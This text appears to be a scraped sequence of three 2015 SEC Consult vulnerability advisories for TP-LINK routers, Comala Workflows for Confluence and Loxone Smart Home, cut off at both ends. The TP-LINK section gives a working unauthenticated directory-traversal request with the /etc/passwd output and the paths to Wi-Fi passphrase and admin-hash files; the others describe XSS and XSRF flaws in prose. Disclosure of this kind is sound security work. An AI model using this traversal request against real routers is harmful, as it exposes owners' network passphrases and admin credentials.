immediately. Vulnerability overview/description: --- Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. Proof of concept: - The following HTTP request shows how directory traversal can be used to gain access to files without prior authentication: === GET /login/../../../etc/passwd HTTP/1.1 Host: $host === The server response includes the contents of the file: === HTTP/1.1 200 OK Server: Router Webserver Connection: Keep-Alive Keep-Alive: Persist: WWW-Authenticate: Basic realm=TP-LINK Wireless Dual Band Gigabit Router WDR4300 Content-Length: 683 Content-Type: text/html root:x:0:0:root:/root:/bin/sh Admin:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh adm:x:3:4:adm:/adm:/bin/sh lp:x:4:7:lp:/var/spool/lpd:/bin/sh sync:x:5:0:sync:/bin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh operator:x:11:0:Operator:/var:/bin/sh nobody:x:65534:65534:nobody:/home:/bin/sh ap71:x:500:0:Linux User,,,:/root:/bin/sh dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh admin:x:500:500:admin:/home:/bin/sh guest:x:500:500:guest:/home:/bin/sh dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh === Several sensitive files can be read. These include: Files containing Wi-Fi configuration including WPA-passphrase: /login/../../../tmp/ath.ap_bss /login/../../../tmp/ath1.ap_bss A file containing administrator credentials (format: $user:md5($password), which can be brute-forced very efficiently: /login/../../../tmp/dropbear/dropbearpwd Example server response: === HTTP/1.1 200 OK Server: Router Webserver Connection: Keep-Alive Keep-Alive: Persist: WWW-Authenticate: Basic realm=TP-LINK Wireless Dual Band Gigabit Router WDR4300 Content-Length: 56 Content-Type: text/html username:admin password:11d0fc2ff3e7862d8a3f9b280e6d390c === Vulnerable / tested versions: - The vulnerability affects the following products: TP-LINK Archer C5 (Hardware version 1.2) TP-LINK Archer C7 (Hardware version 2.0) TP-LINK Archer C8 (Hardware version 1.0) TP-LINK Archer C9 (Hardware version 1.0) TP-LINK TL-WDR3500 (Hardware version 1.0) TP-LINK TL-WDR3600 (Hardware version 1.0) TP-LINK TL-WDR4300 (Hardware version 1.0) TP-LINK TL-WR740N (Hardware version 5.0) TP-LINK TL-WR741ND (Hardware version 5.0) TP-LINK TL-WR841N (Hardware version 9.0) TP-LINK TL-WR841N (Hardware version 10.0) TP-LINK TL-WR841ND (Hardware version 9.0) TP-LINK TL-WR841ND (Hardware version 10.0) Vendor contact timeline: 2015-02-19
SEC Consult SA-20150409-0 :: Multiple XSS XSRF vulnerabilities in Comalatech Comala Workflows
SEC Consult Vulnerability Lab Security Advisory 20150409-0 === title: Multiple XSS XSRF vulnerabilities product: Comalatech Comala Workflows vulnerable version: = 4.6.1 fixed version: 4.6.2 for Confluence 5.4+ and 4.5.4 for Confluence 4.3+ impact: High homepage: https://marketplace.atlassian.com/plugins/com.comalatech.workflow found: 2015-02-16 by: J. Krautwald (Office Berlin) M. Niederwieser (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor product description: - Build your Confluence content your own way through Comala Workflows approvals, tasks, notifications and workflows. Set customized workflows to create, review, approve and publish your content. Assign page reviewers Create team tasks Publish approved content Manage your documentation stages Use Comala Workflows for: Quality Management, Standards Compliance, Technical Documentation, Editorial Publishing Source: https://marketplace.atlassian.com/plugins/com.comalatech.workflow Business recommendation: Comala Workflows suffers from multiple vulnerabilities due to improper input and output validation. By exploiting these vulnerabilities an attacker could: 1. Attack other users of the web application with JavaScript code, browser exploits or Trojan horses, or 2. perform unauthorized actions in the name of another logged-in user. Vulnerability overview/description: --- 1. Multiple cross-site scripting issues Comala Workflows suffers from multiple reflective stored cross-site scripting vulnerabilities, which allow an attacker to steal other user's sessions, to impersonate other users and to gain unauthorized access to documents hosted in the Confluence instance where the Workflows module is embedded. There are many parameters which are not properly sanitized and thus are vulnerable to XSS. 2. Cross-site request forgery vulnerabilities Comala Workflows does not implement the use of shared secrets (tokens) to prevent cross-site request forgery (XSRF) attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages (e.g. discussion forums) he could manipulate data or automatically inject XSS payloads to attack other users. Proof of concept: - 1. Multiple cross-site scripting issues a) The input parameters for giving a workflow a name, appending a label to a given workflow, or adding a new task for a given state are not properly sanitized and thus susceptible to reflected cross-site scripting. The hereby affected scripts alongside the vulnerable GET parameters are: Script GET Parameter(s) saveproperties.actionnewLabelName, newWorkflowName newtask.action taskName When editing an existing workflow via the Markup functionality (accessible via the workflowMarkup POST parameter of /plugins/approvalsworkflow/saveworkflowmarkup.action) the attachment-macro is also susceptible to reflected cross-site scripting. b) When editing an existing workflow via the Markup functionality (accessible via the workflowMarkup POST parameter of /plugins/approvalsworkflow/saveworkflowmarkup.action) the workflow element task does not sanitize the given input and is thus susceptible to cross-site scripting. The application does not sanitize the given input before printing it to the Page Activity popup which leads to the execution of the permanently injected script. When assigning such a task to a co-worker, an e-mail containing the actual payload is sent to the assigned person and when opening the My Comala Workflow Tasks, Page Activity, or Page Activity Macro page, it gets executed. 2. Cross-site request forgery vulnerabilities The /plugins/approvalsworkflow/saveworkflowmarkup.action script for editing an existing workflow via the Markup functionality, for example, is susceptible to cross-site request forgery. If an attacker knows a valid project name (key parameter) and the corresponding workflow name (workflowName parameter), she might exploit this vulnerability to set the Markup code of the workflow to an arbitrary value (e.g. a XSS payload via the task element, see 1. b)). Vulnerable / tested versions: - The vulnerabilities have been verified to exist in up to and including version 4.6.1. Vendor contact timeline: 2015-03-17: Contacted vendor through email 2015-03-18: Vendor confirmed
SEC Consult SA-20150227-0 :: Multiple vulnerabilities in Loxone Smart Home
SEC Consult Vulnerability Lab Security Advisory 20150227-0 === title: Multiple vulnerabilities product: Loxone Smart Home vulnerable version: Firmware: 5.49; Android-App: 3.4.1 fixed version: 6.3 impact: High homepage: http://www.loxone.com found: 2014-07-02 by: Daniel Schwarz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com Manuel Deticek, Alexander Inführ, Robert Pölzelbauer FH-St.Pölten - Institut für IT Sicherheitsforschung http://www.fhstp.ac.at === Vendor product description: - Loxone Electronics was founded in 2008. Our focus is the development and production of control solutions for all homes. Our aim is to make home automation interesting, affordable and accessible for everyone. URL: http://www.loxone.com/enus/company/about-us.html The Loxone Smart Home gives the owner full control of every device or task using a wall switch, phone or smart tablet. Control and automte areas such as: Lighting, Climate, Security, Audio/Video, Shading, and event Pool and irrigation systems. Your system will adapt all areas of your home providing complete smart home automation. URL: http://www.loxone.com/enus/smart-home/overview.html Business recommendation: The Loxone Smart Home has multiple design and implementation flaws which could be used by an attacker to: 1) cause a denial of service, 2) steal the user's credentials, 3) execute JavaScript code in the user's browser or 4) control arbitrary devices connected to the system. It is recommended by SEC Consult not to use this system until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Unencrypted data-transmission All available communication is unencrypted and could therefore get intercepted and manipulated by a man-in-the-middle attacker. This enables an attacker to control every device within the smart home system. Furthermore a plaintext authentication mechanism is supported which enables an attacker to steal user-credentials. 2) Missing state-of-the-art http-header The http-headers set doesn't comply with the current state-of-the-art. Therefore it is possible to embed the webinterface within an iframe and misuse it for phishing attacks. Furthermore no CSP-Headers are set in order to prevent cross-site scripting attacks. 3) Cross-site request-forgery (XSRF) The system is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages (e.g. discussion forums) he could control arbitrary devices within the smart home system. 4) HTTP Response Splitting The backend of the smart home system is vulnerable to HTTP response splitting attacks. If an attacker is able to lure a user into clicking a crafted link he could arbitrarily manipulate the server's response (e.g. injection of JavaScript code). 5) Multiple reflected cross-site scripting (XSS) vulnerabilities The admin webinterface of Loxone Smart Home is vulnerable to multiple reflected cross-site scripting attacks. If an attacker is able to lure a user into clicking a crafted link he could execute arbitrary JavaScript-code in the user's browser. Thereby he could steal the user's credentials or control arbitrary devices within the smart home system. To exploit this vulnerability it isn't mandatory for the user to be authenticated. Unauthenticated XSS vulnerabilities exist as well (by exploiting the HTTP Response Splitting vulnerability described in 4) as authenticated ones. 6) Stored cross-site scripting vulnerability Beside the already mentioned reflected XSS vulnerabilities the Loxone Smart Home System also contains a stored XSS vulnerability. An authenticated attacker is able to persistently inject JavaScript code in the user webinterface. This code gets executed in the context of other users at every login as well as by calling a certain functionality of the webinterface. The injection of the code itself could either be done via the webinterface or could also be conducted through the already mentioned XSRF vulnerability. Therefore it is not necessary for the attacker to login explicitly. After circumventing some filtering-obstacles an attacker for example could be able to automatically disable a connected alarm-system everyday at midnight. 7) Insecure storage of credentials
